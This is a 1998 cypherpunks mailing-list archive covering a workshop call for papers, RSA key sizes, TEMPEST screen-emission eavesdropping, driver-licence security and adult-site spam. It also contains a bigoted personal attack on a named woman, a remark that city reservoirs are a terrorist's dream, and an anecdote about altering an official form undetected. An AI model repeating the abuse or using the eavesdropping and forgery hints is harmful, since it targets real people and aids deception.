At 03:22 PM 2/8/98 -0800, Tim May wrote:
>At 3:02 PM -0800 2/8/98, Igor Chudov @ home wrote:

>>rec.games.mecha Giant robot games. (Moderated) Quest/Illegal/Gamble
>>Violence/Profanity Intol
>
>Perhaps the strategy should be to post material to other newsgroups to get
>them blocked as well. (Though I expect the blocking is not being done using
>robots to monitor for illegal words, as rec.guns would not have been
>blocked this way. Rather, the cyber nannies are probably using their "PC
>judgment" to block groups they don't like.

You need to consider that rec.games.mecha is primarily a dumbed down
alt.flame and includes postings from that obnoxious avowed 300 pound
communist bisexual converted jew Camille Klein (she claims she is down to
275 lbs.).  I wouldn't my kids to read her garbage posts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Ellen Zurko <zurko@opengroup.org>
Date: Tue, 10 Feb 1998 02:33:56 +0800
To: cypherpunks@toad.com
Subject: New Security Paradigm Workshop '98 Call For Papers
Message-ID: <199802091812.NAA12129@postman.opengroup.org>
MIME-Version: 1.0
Content-Type: text/plain




========================================================================
                           Call For Papers
                   New Security Paradigms Workshop '98
                      A workshop sponsored by ACM
                        22 - 25 September 1998
========================================================================

Paradigm shifts disrupt the status quo, destroy outdated ideas and 
open the way to new possibilities. This workshop explores deficiencies 
of current computer security paradigms and examines radical new models 
that address those deficiencies. Previous years' workshops have 
identified problematic aspects of traditional security paradigms and 
explored a variety of possible alternatives. Participants have discussed 
alternative models for access control, intrusion detection, new 
definitions of security, privacy and trust, biological and economic 
models of security and a wide variety of other topics. The 1998 workshop 
will strike a balance between building on the foundations laid in past 
years and exploring new directions.

To participate, please submit the following, preferably via e-mail, to 
both Program Chairs (Mary Ellen Zurko and Steven J. Greenwald) by
Friday, 3-April-1998.

1 - Your Paper

You should submit either a research paper, a 5 - 10 page position 
paper or a discussion topic proposal. Softcopy submissions should be 
in Postscript or ASCII format. Papers may besubmitted in hardcopy. 
To submit hardcopy, please mail five 
(5) copies to Program co-chair Steven Greenwald. Please allow adequate 
time for delivery. The hardcopy deadline is 27-March-1998.

Discussion topic proposals should include a description of the topic to 
be discussed, a pro and con position statement on the topic, 
identification of the parties who will uphold each position, any assurances 
that the participants agree to attend, and any other
information that the proposer thinks would support their proposal
(such as who will moderate). One potential topic for discussion is
"Is there a current security paradigm?".

2 - Justification
You should describe, in one page or less, why you think your paper is 
appropriate for the New Security Paradigms Workshop. A good 
justification will describe which aspects of the status-quo security paradignm 
your paper challenges or rejects and which new model or models
your paper proposes or extends.

3 - Attendance Statement
You should state how many authors wish to attend the workshop and should 
indicate whether at least one author will be able to attend for the 
entire duration of the workshop. The program committee will referee the 
papers and notify the authors of acceptance status by 12-June-1998. We 
expect to be able to offer a limited number of scholarships. More 
information will be provided on-line as it becomes available.

4 - The Workshop 
The workshop will offer a creative and constructive environment for 
approximately 25 participants. It will be held at the Boar's Head Inn in 
the vicinity of "historic" Charlottesville, Virginia.


Steering Committee

Bob Blakley, Mary Ellen Zurko, Steven J. Greenwald, 
Darrell Kienzle, Hilary Hosmer


Workshop Co-Chairs

Bob Blakley
IBM
11400 Burnet Road, Mail Stop 9134
Austin, TX 78758 USA
e-mail: blakley@us.ibm.com
voice: +1 (512) 838-8133
fax: +1 (512) 838-0156

Darrell Kienzle
MITRE, Mail Stop W422
1820 Dolley Madison Blvd.
McLean, VA 22102 USA
e-mail: kienzle@mitre.org
voice: +1 (703) 883-5836
fax: +1 (703) 883-1397

Program Committee Co-Chairs
 
Mary Ellen Zurko
The Open Group Research Institute
11 Cambridge Center
Cambridge, MA 02142 USA
e-mail: zurko@opengroup.org
voice: +1 (617) 621-7231
fax: +1 (617) 225-2943

Steven J. Greenwald
2521 NE 135th Street
North Miami, FL 33181 
USA
voice: +1 (305) 944-7842
fax: +1 (305) 944-5746
e-mail: sjg6@gate.net

Program Committee

Alfarez Abdul-Rahman, University College London
Steven Cheung, University of California, Davis
Shaw-Cheng Chuang, University of Cambridge
John Dobson, University of Newcastle, UK
Heather Hinton, Ryerson Polytechnic University, Canada
Tom Lincoln, RAND
Masahiro Mambo, Tohoku University
Catherine Meadows, Naval Research Laboratory
Ruth Nelson, Information System Security
Thomas Riechmann, University of Erlangen-Nuernberg
Marvin Schaefer, Arca Systems, Inc.
Cristina Serban, AT&T Labs
Anil Somayaji, University of New Mexico
Brenda Timmerman, University of Southern California / ISI
Ian Welch, University of Newcastle upon Tyne
John Michael Williams

Local Arrangements
Chenxi Wang (University of Virginia) +1 (804)982-2291

Scholarships
Hilary Hosmer (Data Security Inc.) +1 (781) 275-8231

Publications
Marv Schaefer (ARCA Systems) +1 (410) 309-1780

Publicity
Daniel Essin (University of Southern California) +1 (213) 226-3188

Treasurer/Registration
Dixie Baker (SAIC) +1 (310) 615-0305

ACM-SIGSAC Chair
Ravi Sandhu (George Mason University) +1 (703) 993-1659






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 08:49:07 +0800
To: Ken Williams <ATU5713@compuserve.com>
Subject: Re: What's the latest in factoring?
In-Reply-To: <199802072222_MC2-3262-79F5@compuserve.com>
Message-ID: <3.0.5.32.19980209134003.0088b660@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:20 AM 2/9/98 -0500, Ken Williams wrote:
>8192 bits is used now.  you can generate 8192 bit keys with PGP 2.6.3ui
>(the unofficial international version).
...
>[note:  you can of course generate MUCH larger keys, but i'm attempting to
>be practical for a change]

There are two countervailing arguments about very long keys;
one is that if you understand cryptography well enough to 
evaluate the issue, you'll know you don't need to bother,
but the other is that if you don't understand crypto very well,
maybe you should be overly conservative.

Remember that factoring difficulty is roughly exponential;
adding logn bits about doubles the cracking workload 
(depending on which factoring method is being used).  
Factoring a 1024-bit number is _much_ harder than factoring a 512-bit
number, and factoring a 2048-bit number is well into age-of-the-universe 
difficulty level.  The practical level of factoring right now
is about 512 bits, for either a distributed internet effort or
an NSA internal one; in the unlikely event that Moore's law lets
us double processing power 100 times in the next 150 years,
that means a 1500-bit key could be crackable.  So 2048 bits
is certainly more than enough for _your_ lifetime.
Increasing processing power 2**100 times is likely to be tough :-)
After all, features in current microprocessors are on the order
of 100 atoms wide.  And by the time we've developed the level of 
nanotechnology needed to speed up processing that much,
there'll be tiny audio bugs listening to you type your passphrase
into your keyboard and reporting it back to the Central Intelligence
Corporation, or picking up the electromagnetic fields from your
direct neural interface, so the crypto strength won't matter much.

But do you really _need_ to factor the prime number to crack PGP?  No.
Remember that PGP uses the RSA key to encrypt session keys for IDEA,
or for signing MD5 hashes of documents, rather than using it directly.
So you can decrypt the message by cracking IDEA, or forge a message
by finding MD5 collisions.  Cracking IDEA's 128-bit keys was estimated
to be about as hard as factoring a 3100-bit number, though improvements
to factoring technology may make a 4096-bit number as easy as IDEA.
Also, PGP 2.x passphrases are encrypted with IDEA, so if they've
got your secring.pgp and can crack 4096-bit keys, you're toast,
even if your passphase isn't just your dog's name spelled backwards.
Similarly, by the time processing power doubles 100 times making your
1500-bit key insecure, MD5 will be long toasted.  Either way,
there's no need to go beyond 4096-bit keys ever, with old-style PGP.
Even if you're being overly conservative, that's more than enough.

Newer versions of PGP dump RSA and IDEA for patent reasons, 
but they also offer alternatives to IDEA and MD5 which may be stronger.
(SHA-1 is stronger than MD5, triple-DES requires immense amounts of
storage to reduce it to a strength similar to IDEA, and just being
extensible means you can replace algorithms that are obsolete.)

The other side of practical is how much work it takes to use long keys,
and how many people who want to talk to you use them.
The answer to the latter is "Not many" for RSA keys over 2048.
The former is about N**2 for decryption and N**3 for key generation,
and about linear for encryption with short exponents,
so it'll take you 64 times as long (once) to generate the key,
and 16 times as long to decrypt or sign anything, compared to
the far-more-than-strong-enough 2048-bit key, which is already
4 times as hard to use and 8 times as hard to generate as a 1024.
It's not worth the bother, unless you know have a really, really 
special application that needs to remain secret until long after
you've overthrown the government.  On the other hand,
at least the RSA patent will have expired by then :-)

The Diffie-Hellman implementations in PGP 5.x will let you use
key lengths up to 4096, but the speed behaviour is a bit different.
In particular, key generation is much faster, so generating
overkill-length keys isn't as boring.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Feb 1998 03:29:01 +0800
To: cypherpunks@toad.com
Subject: Re: Washington on the verge of being nuked?
In-Reply-To: <3.0.5.32.19980209090323.007ba100@otc.net>
Message-ID: <1XDNke1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



David Honig <honig@otc.net> writes:

> The water supply systems of LA are easy targets for causing civil
> disruption, too.

Don't know about LA, but New York City gets its water supplies from open
reservoirs upstate - a terrorist's dream.

> 
> 		Lewinsky for President '2012
Vote for Monica - get a free blow job.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D'jinnie" <jinn@inetnebr.com>
Date: Tue, 10 Feb 1998 04:29:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
In-Reply-To: <v03102801b104e8dbf314@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980209141656.9431B-100000@falcon>
MIME-Version: 1.0
Content-Type: text/plain



How exactly can they require for the DL to be magnetized if only a few
states do that? My NE license is just a piece of photographed paper
encased in plastic. The only thing that "protects" it from forgery is a
"Don't Drink and drive" and "buckle up Nebraska" silvery warnings that can
be seen under certain angles. I don't see them changing it anytime
soon...thank gods for slow ppl ;) So...seems like there can and will be a
lawsuit against such practices.

---
Reality leaves a lot to the imagination.

jinn@inetnebr.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 08:43:01 +0800
To: cypherpunks@cyberpass.net
Subject: Re: the best justice money can buy --Lessig (fwd)
In-Reply-To: <887036600.23860.193.133.230.33@unicorn.com>
Message-ID: <3.0.5.32.19980209142240.0088b680@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[Warning: while this may _look_ like just another rant,
there is some technical content below.]

At 07:03 AM 2/9/98 -0800, mark@unicorn.com wrote:
>Jim Choate (ravage@ssz.com) wrote:
>>So do I, and I bet both our incomes combined doesn't add up to 15 minutes of
>>Bill G's and it won't. 
>
>Of course not, because Bill has jackbooted copyright enforcers to subsidise
>his corporation. Without them his income would be dramatically reduced.
....
>Exactly. So tell us how Bill would have become a billionaire without
>copyright?

Gates got rich not by selling good software, but by selling software
very well.  Copyright is part of the process, but it's possible to
sell your product to computer manufacturers with any customization
they need using contracts instead of copyright to make your money.
It's also possible to do copy protection in your software;
games makers do this because they're widely pirated by non-point-source
attacks (kids, mostly) who are hard to track down and sue,
unlike major computer manufacturers who are easier to find,
both to sue if needed or to provide support for.
Copy protection was one of the things people hated about Lotus 123;
I don't remember Excel or MS-DOS ever having it.

When I've used expensive commercial software on Sun computers, 
it often needs to be registered with the machine serial number, 
or used with a floating license server, and refuses to run without it.
PCs don't have built-in serial numbers, but they probably would
if Gates had insisted on it early enough.  Because of copyright law
he didn't _have_ to use technical means of copy protection,
so the Copyright Enforcers have saved him money - but they've
also saved us the aggravation of dealing with copy protection wares.

If you _want_ a serial number on each PC for your product,
dongles are an available option.  They reduce portability somewhat,
but software like Banyan Vines networking uses them on its servers.
So even the fact that IBM and Mr.Bill didn't install one doesn't
stop you from using them - and as anti-crypto law goes away,
uncrackable dongles are becoming easier to make (I don't know if
anybody bothers, though.)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D'jinnie" <jinn@inetnebr.com>
Date: Tue, 10 Feb 1998 04:36:17 +0800
To: cypherpunks@cyberpass.net
Subject: fingerprinting
Message-ID: <Pine.GSO.3.95.980209142639.9431D-100000@falcon>
MIME-Version: 1.0
Content-Type: text/plain



Immigration & Naturalization Department has been fingerprinting ppl for
years. Does anyone have any ideas what agencies that information is shared
with and what they need it for anyway?
And what's with that new thumbprint thing in banks? I haven't had occasion
to refuse it yet but I wonder if they'd open an account without it...

---
Reality leaves a lot to the imagination.

jinn@inetnebr.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Tue, 10 Feb 1998 03:41:11 +0800
To: cypherpunks@minder.net
Subject: [test - ignore]
Message-ID: <Pine.LNX.3.96.980209142756.13433B-100000@ns.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



ping






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nowhere.com
Date: Tue, 10 Feb 1998 07:10:34 +0800
To: cypherpunks@toad.com
Subject: 11 CENTS A CLICK - PINKCASH PAYS CA$H UPFRONT
Message-ID: <199802092242.OAA05496@remote.gsd.com.au>
MIME-Version: 1.0
Content-Type: text/plain



Friends,

I am Scott Phillips from www.pbits.com,

My apologies for this short spam, I`m only sending it because as a fellow
ADULT WEBMASTER I know you will be interested in the first click thru
system to pay you IN ADVANCE, BEFORE YOU EVER SEND A HIT!

Lets keep it short and sweet so HERE IS THE DEAL!
Sign up here http://usa-6.gsd.com.au/moremoney

And get paid 11c a unique click by ww.pbits.com 

WE OFFER THE FOLLOWING BENEFITS

- Real time stats
- Click counts that are 100% real - NEVER BEEN ACCUSED OF SHAVING HITS
- Rated "good as gold" on Serge`s good bad ugly sponsor list http://pusi.com/~contest
- FRESH banners that pull HARD
- straight, gay, hardcore, teen, fetish sites, we have it ALL covered
- On the net since May 96 never ripped off a webmaster
- The checks are cut by the legendary Serge, who has never been late with a payment ever!
- Auto-signup
- I answer email personally
- Software designed by BobX who wrote the clickthru for cybererotica.com

http://usa-6.gsd.com.au/moremoney

This is my personal guarantee to you, my fellow webmasters. Pinkcash
*is* and will always be the highest paying clickthru on the net. No matter
what others claim to pay, at the end of the day you make more money with us,
its a FACT! If you earn more with other clickthru programs I will refund the
difference. Statistics show that a .11 banner for pinkbits earns TWICE
what an xpics banner at 14c does. This is because we DON'T shave hits or
filter every AOL proxy to steal from you.

http://usa-6.gsd.com.au/moremoney

HOW DO WE PAY IN ADVANCE? After you have a trading history with us for a
month or two we put you on the advance program. Currently 93% of our
traffic is payed before the hits are sent. This is not an idle promise,
we send checks everyday. Look at http://www.pbits.com/whosyerdaddy to see a
few real checks for people you probably know. And by the way, we pay an
extra cent per click when we pay you in advance, its our way of thanking
you for being trustworthy honest webmasters just like us.

http://usa-6.gsd.com.au/moremoney

I live in Australia but I`m travelling around the USA at the moment
catching up with webmaster friends and buying more traffic. If you have
the ability to send bulk volume traffic contact me and I`ll visit you while
I`m in the USA

Nobody has ever left our clickthru ever. Nobody has ever had a complaint
EVER. This is state of the fucking art software, we are cool people, we want
your business, and we treat you right. AND WE PAY MORE!

Sign up now
http://usa-6.gsd.com.au/moremoney

Thanks

Scott Phillips

--- TO REMOVE YOURSELF FROM THIS LIST CLICK BELOW ---
    http://207.33.10.200/maillist/remove.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon dyer <landon@best.com>
Date: Tue, 10 Feb 1998 07:39:02 +0800
To: "D'jinnie" <jinn@inetnebr.com>
Subject: Re: Driver Licenses and agreeing to something
In-Reply-To: <v03102801b104e8dbf314@[207.167.93.63]>
Message-ID: <3.0.3.32.19980209153231.00aa4430@shell9.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:20 PM 2/9/98 -0600, you wrote:
>
>How exactly can they require for the DL to be magnetized if only a few
>states do that? My NE license is just a piece of photographed paper
>encased in plastic. The only thing that "protects" it from forgery is a
>"Don't Drink and drive" and "buckle up Nebraska" silvery warnings that can
>be seen under certain angles. I don't see them changing it anytime
>soon...thank gods for slow ppl ;) So...seems like there can and will be a
>lawsuit against such practices.
>
>Reality leaves a lot to the imagination.

  this can work two ways... especially if the people you're trying
to work are not paying attention

  a friend of mine recently had his state license renewed.  i think
they have the procedure for doing fingerprints down pretty much so they
are inescapable if you want a new D/L, buuut...

  one of the things they make you sign at the bottom of the form is
an agreement that starts out "I agree to...".  my friend ran the form
through a scanner, changed "agree" to "disagree" and printed out his
own version of the form.  he handed it in and naturally the pencil-
pushers never gave it a second glance


-landon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au>
Date: Mon, 9 Feb 1998 14:45:53 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Soft Tempest
In-Reply-To: <v03102800b1044ad31629@[207.167.93.63]>
Message-ID: <Pine.LNX.3.93.980209160104.1185B-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 8 Feb 1998, Tim May wrote:

[...]

> Really? You think so? You think TEMPEST treatment of laptops is more
> expensive than of normal machines?

Laptops have a very tight size and waight budget.  I would immagion this
is the limmiting factor rather then the RF emissions.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNN6OF6QK0ynCmdStAQFJaQQAkszblxy6EsbYL/xpFlrqjsBSYVtfd+nm
lKTSccmEb2be6Eh7RYa9nUxQ1Pi3j/EzTCzkRc1SI1vxG1LfLc7721E9TR18Tk6N
bfcNE7uolpSfMKaQO1J8ilihzc0aSYVFDFseLjID9cMRkwLwy84fmvlPUN0bNq7s
71IrIXzctLk=
=7qfO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 10 Feb 1998 08:43:07 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Laptop TEMPEST (fwd)
In-Reply-To: <199802091430.IAA20623@einstein.ssz.com>
Message-ID: <3.0.5.32.19980209163616.0088a200@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:30 AM 2/9/98 -0600, Jim Choate wrote:
>> FCC RF/EMC testing is well nigh useless for TEMPEST protection.
>
>I disagree, it would give you a gross baseline on the total emissions
>between monitors and laptops. That field strenght measurement would at least
>allow you to calculate radiuses of equal strength to calculate approximately
>how far the emissions are from each class of device for equal probabilities
>of detection. One of the specific goals is to measure how effective the
>device is at effecting other co-located devices (such as seeing ghost images
>on other monitors or causing static in paging equipment).

FCC specs aren't real tight.

My old laptop*, which passed FCC specs (at least when it was new,
before being hauled around on airplanes and trains, dropped a few times,
having cooked parts replaced, and generally getting treated like a laptop),
broadcast enough emissions that its video would show up on my parents' TV
when used 2-4 meters away.  The video sync wasn't right, so there were
several hard-to-read images of the screen on the TV, but it was obviously
emitting enough that a properly tuned receiver could read it.
On the other hand, it doesn't bother my TV from 8-10 meters away,
but I've got cable, while my parents use Real Rabbit-Ear Antennas and 
some kind of antenna-booster widget.

I have heard that passive-matrix emits less, but I don't know
if that's true from a TEMPEST standpoint or only noise output.

It is a bit easier to put a laptop into an RF-shielded enclosure,
but enclosures that worked fine for harmonics of 4.77 MHz machines
don't necessarily block harmonics of 477 MHz machines :-)
especially critical are the penetrations used to get air and
fiber-optic connections through, which are basically waveguides -
once the wavelength of the signal is short enough, they lose.
___
* AT&T Globalyst 250P, which is a NEC Versa Pentium-75 with a Death-Star
painted on it.  It has the expensive active-matrix 24-bit-color 640x480
screen (sigh - I'd rather have had the cheaper 800x600 8-bit-color :-).
A couple years old, and the case was a bit dented so perhaps it had been 
more radio-tight when it was new.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 03:21:29 +0800
To: cypherpunks@sirius.infonex.com
Subject: Re: SOFT TEMPEST
In-Reply-To: <34DDEB81.65726105@InfoWar.Com>
Message-ID: <E0y1wKR-00084W-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



"WebWarrior3@InfoWar.Com" wrote on 1998-02-08 17:29 UTC:
> So, when the software police pull up outside of my
> place of business see that there are six instances of a program being
> displayed with one license I can expect a warrant to be issued?  That
> would suck.

The software that displays the license number plus activation instance
random code in your windows toolbar as an easy receivable spread
spectrum barcode would have to take care of this depending on how
exactly your license agreement is formulated. This can be resolved
in many ways.

The technique of hunting software license violators via Tempest
monitoring is not really targeted at providing 100% accurate
and reliable identification of abuse at any point of time as
you seem to imply. Nor is it alone an effective tool of proofing
abuse. It is more an additional tool in getting an initial hint
that a company is violating a software license at large scale
(e.g., has bought a single copy of an expensive CAD software but
uses it on over 80 workstations all day long), which then can
justify to get court relevant proof by traditional means of
police investigation.

> Unfortunatley, I do not have the time to read through the entire
> document at the URL provided, and can't save it either from the .pdf ...
> the defensive measures sound interesting.

One obvious countermeasure are Tempest shielded computers or rooms,
but these are rather expensive, inconvenient and not always reliable.
Another countermeasure are software reverse-engineering and modifying
the broadcast code. This is around as difficult as removing dongle
checking code: Not impossible, but for the majority of users too
inconvenient.

> Also, does this only work with CRTs or can it detect LCD too?

Oh, yes, beautifully! Ross' TFT laptop radiates better
than the CRT on my desk here. It is true that LCD displays do not have
the <400 kHz signals caused by the deflection coils that are of concern
for the TCO/MPR low-radiation standards. But they radiate as well in the
>1 MHz range where the information carrying signals are
broadcasted as harmonics of for instance the dot clock rate.
LCDs are connected to high-speed drivers with sharp edges and lot's
of nice harmonics.

One more remark: This was so far unfunded research initiated by
our private interest in the subject of compromising radiation. In
this field, the available research literature is very close to zero
(there are the van-Eck/Moeller/Smulder papers and that's it basically), and
all the real knowledge is tightly guarded by the military and diplomatic
community. We hope that developing commercial applications for
compromising radiation will open the way to non-military funding
and open research in this field. Copyright protections seems to be
an interesting application. Tempest research requires some
expensive equipment (special antennas, very high-speed DSP
experimental systems, an absorber room, etc.). If Microsoft or
someone else would like to make some Tempest funding available, I think
this should be highly welcome if the results are going to be published
in the open literature. There is no good reason, why knowledge about
compromising emanations should be restricted to the military
community in a time where industrial espionage with these techniques
is probably a larger threat to economies than the results of foreign
intelligence operations.

The preprint of our first paper on this is now on my home page.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 10 Feb 1998 06:09:25 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: Driver Licenses
Message-ID: <199802092153.QAA07449@mx01.together.net>
MIME-Version: 1.0
Content-Type: text/plain



On 2/9/98 12:25 PM, Tim May (tcmay@got.net)  passed this wisdom:

>Lucky is right that that "underage stings" are on the increase. 
>Underage persons, often in high school, beome self-righteour 
>warriors in the War On Demon Rum, and "narc out" their local 
>shopkeepers.

As I write this there are advertisements up in the halls at the HS 
(obviously with school blessings) where I teach (a few miles east of 
Burlington, VT) specifically soliciting 17 year olds to work for a 
private company under contract to the state to 'test buy' tobacco 
products. I haven't heard about any takers yet nor anything backfiring.

>Hey, it would serve these junior narcs right if, upon being carded 
>and being shown to be underage, a store owner made a citizen's 
>arrest. Perhaps putting the perp in the back freezer for a few 
>hours would send a message.

  I wonder, though, how long it would go on if some shopkeeper indeed did 
this? But, is it a crime to try to buy booze or tobacco underage, if you 
do not try to show fraudulent indentification?


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "He's not dead -- He's electroencephalographically challenged."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 01:11:17 +0800
To: cypherpunks@toad.com
Subject: Re: Soft Tempest
In-Reply-To: <v03102800b1044ad31629@[207.167.93.63]>
Message-ID: <E0y1wTB-0000ZO-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote on 1998-02-09 06:14 UTC:
> The physics suggests just the opposite: the RF emissions from laptops are
> expected to be lower from first principles, and, I have heard, are
> measurably much lower. (I say "have heard" because I don't have any access
> to RF measurement equipment...I once spent many hours a day working inside
> a Faraday cage, but that was many years ago.)
> 
> The first principles part is that the deflection yokes in a CRT are the
> largest radiated component of what got named "van Eck radiation." (I'd just
> call it RF, but whatever.)

You have to differentiate between information carrying emanations
and non-information carrying ones. The horizontal and vertical
deflection coils produce a lot of radiation at harmonics of the
line and frame rate of your CRT, but this signal energy is not
related to your screen content (only to your video mode), and therefore
not of much concern for the eavesdropper. The low-radion monitor
standards look only at those signal (<400 kHz). Therefore having
a TCO92 monitor provides you absolutely no advantage with respect
to eavesdropping.

The information carrying signals of VDUs are in much higher frequency
ranges in the VHF/UHF bands. Laptops are pretty good broadcasters
there, too.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 01:14:13 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Laptop TEMPEST
In-Reply-To: <199802090657.AAA19180@einstein.ssz.com>
Message-ID: <E0y1wgF-0007kz-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote on 1998-02-09 06:57 UTC:
> Doesn't the FCC have to test the RF emissions of all laptops as well as
> monitors for sale as Class A and Class B in the US? Shouldn't that material
> be available? I searched the main site, www.fcc.gov, but didn't find
> anything regarding this.

I suspect that FCC material is not helpful with regard to Tempest.
Results of such EMI tests only measure the general power spectrum
emitted by a device. Of interest for Tempest purposes however is
not the power spectrum, but the spectrum of the cross-correlation
between an internal signal-of-interest in the device and the
emanated radiation. There are special cross-correlation meters
available to measure this, but this is not the equipment used in
EMI tests. I have here two patents filed by the German equivalent
of the NSA, that describes cross-correlation techniques for the
"detection of highly distorted digital signals". Measurement equipment
along those lines are what you need in order to estimate the
information carrying components of the emanated spectrum.

You can do cross-correlation not only between the VGA cable output
and the signal picked up by an antenna or a power/ground line tap,
but also between internal bus lines, the keyboard power/data lines,
the read amplifier signal in your harddisk, etc. Cross-correlation
tests are also useful to measure cross-talk effects between neighbor
cables in your building. As mentioned in our paper, secret data on
your LAN can easily leave your building via phone cables that ran
parallel to your network cable for only a few meters.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 07:17:52 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST (fwd)
Message-ID: <199802092316.RAA24851@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: TEMPEST
> Date: Mon, 09 Feb 1998 21:07:22 +0000
> From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

> Things are somewhat more complicated and I am not convinced that
> the e-beam is the primary source of radiation.

Only of the individual pixel modulations. Go back and re-read my post you
missed a whole slew of implications. The vertical and horizontal positioning
is via the yoke not the screen grid. Electrostatic steering of an e-beam
is expensive and slow, you can't change the charge on the plates that fast.

In regards the data for the individual scan lines, where else are you going
to modulate that beam than a screen grid? This is a high-voltage low-current 
point. You can't drive the beam off the screen, the inside of the tube is
coated in a carbon based chemical called 'aquadag' that will short the beam
to ground and blow your flyback transformer in short order. Not to mention
that the inertia of the e-beam will be a bit of a hassle to deal with as
well. It won't move that fast.

> Your claim that
> the Tempest radiation is modulated by the screen grid does not agree with
> my practical experience: All signals I get are close to harmonics of
> the dot clock and not of the screen grid rate.

The screen grid is where the dot clock goes to modulate the e-beam, or is
your claim we're going to modulate the filament directly? If so I would
suggest you re-take your electronics class and learn how to read a schematic
a tad better. A short trip to either your local library or electronics
repair business will pay off wonders. You're looking for a Sam's Photo-Facts
on the particular monitor you are examining. There is also the fact that the
dot clock itself is a low-voltage low-current device until it gets to the
tube drive electronics where it switches the high voltage drivers to the
tube.

If your getting your signal off the harmonics you're doing it the hard way.
Go back and re-read your texts on Fourier Transforms and then do a
power-spectrum analysis on the signals to the tube; what you will find is
that the primary frequencies get the majority of the signal (eg 1st harmonic
of a square wave (ie a dot clock) only gets, at best, 1/3 of the energy of
the primary).

In any case, it's the high voltage emissions of the tube drive electronics
that are detected, not the small 5V to 12V drive signals. The same is true
for LCD, Plasma, and other flat panel displays. You detect the high-voltage
emissions of the display drive electronics. Note that on active transistor
displays (where you don't have the high voltage bias as in a LCD) you don't
get these sorts of emission magnitudes and they are *much* harder to detect.
In addition in the active transistor displays the display drive electronics
should buffer the data and so, unlike a CRT, you don't have to send each
individual pixel every time. You can actualy send only the changes and
impliment those. Unless you're integrating the signals you receive your
